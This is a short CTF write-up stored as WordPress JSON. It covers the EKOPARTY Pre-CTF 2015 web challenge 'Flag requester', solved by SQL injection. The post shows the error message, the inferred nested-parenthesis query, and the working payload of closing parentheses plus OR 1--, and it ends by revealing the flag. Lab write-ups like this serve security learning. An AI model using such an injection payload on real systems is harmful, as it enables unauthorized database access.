{"id":1243,"date":"2015-09-23T00:29:02","date_gmt":"2015-09-22T22:29:02","guid":{"rendered":"https:\/\/0x90r00t.com\/fr\/?p=1243"},"modified":"2015-09-23T02:56:41","modified_gmt":"2015-09-23T00:56:41","slug":"ekoparty-pre-ctf-2015-web-25-flag-requester-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2015\/09\/23\/ekoparty-pre-ctf-2015-web-25-flag-requester-write-up\/","title":{"rendered":"[EKOPARTY PRE-CTF 2015] [Web 25 \u2013 Flag requester] Write Up"},"content":{"rendered":"<h2>Description<\/h2>\n<blockquote><p>Go and get your flag!<\/p><\/blockquote>\n<p><!--more--><\/p>\n<h2>Resolution<\/h2>\n<p>We are presented with a simple input field.<\/p>\n<p>We need to retrieve the flag, so let's test with the famous \"'\" character that DBMSs hate, to see whether an SQL injection is possible.<\/p>\n<p>After submitting the form, a syntax error is returned:<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">ERROR: near &quot;'))))))))))))))))))))&quot;: syntax error<\/pre>\n<p>What do all these parentheses mean? 
Could the query be of the form:<\/p>\n<pre class=\"brush: sql; title: ; notranslate\" title=\"\">SELECT user, password FROM users WHERE credz = (((((((((((((((((((('$input'))))))))))))))))))))<\/pre>\n<p>We then supply the right number of closing parentheses, along with what is needed to make the comparison pass: <code>')))))))))))))))))))) OR 1--<\/code><\/p>\n<p>And it works \ud83d\ude09<\/p>\n<p><code>The flag is: EKO{sqli_with_a_lot_of_)}<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description Go and get your flag!<\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34,35,70],"tags":[88,19,57],"class_list":["post-1243","post","type-post","status-publish","format-standard","hentry","category-2015-fr","category-ctf-fr","category-ekoparty","tag-parentheses","tag-web","tag-sql"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=1243"}],"version-history":[{"count":4,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1243\/revisions"}],"predecessor-version":[{"id":1277,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1243\/revisions\/1277"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=1243"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=1243"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=1243"
}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}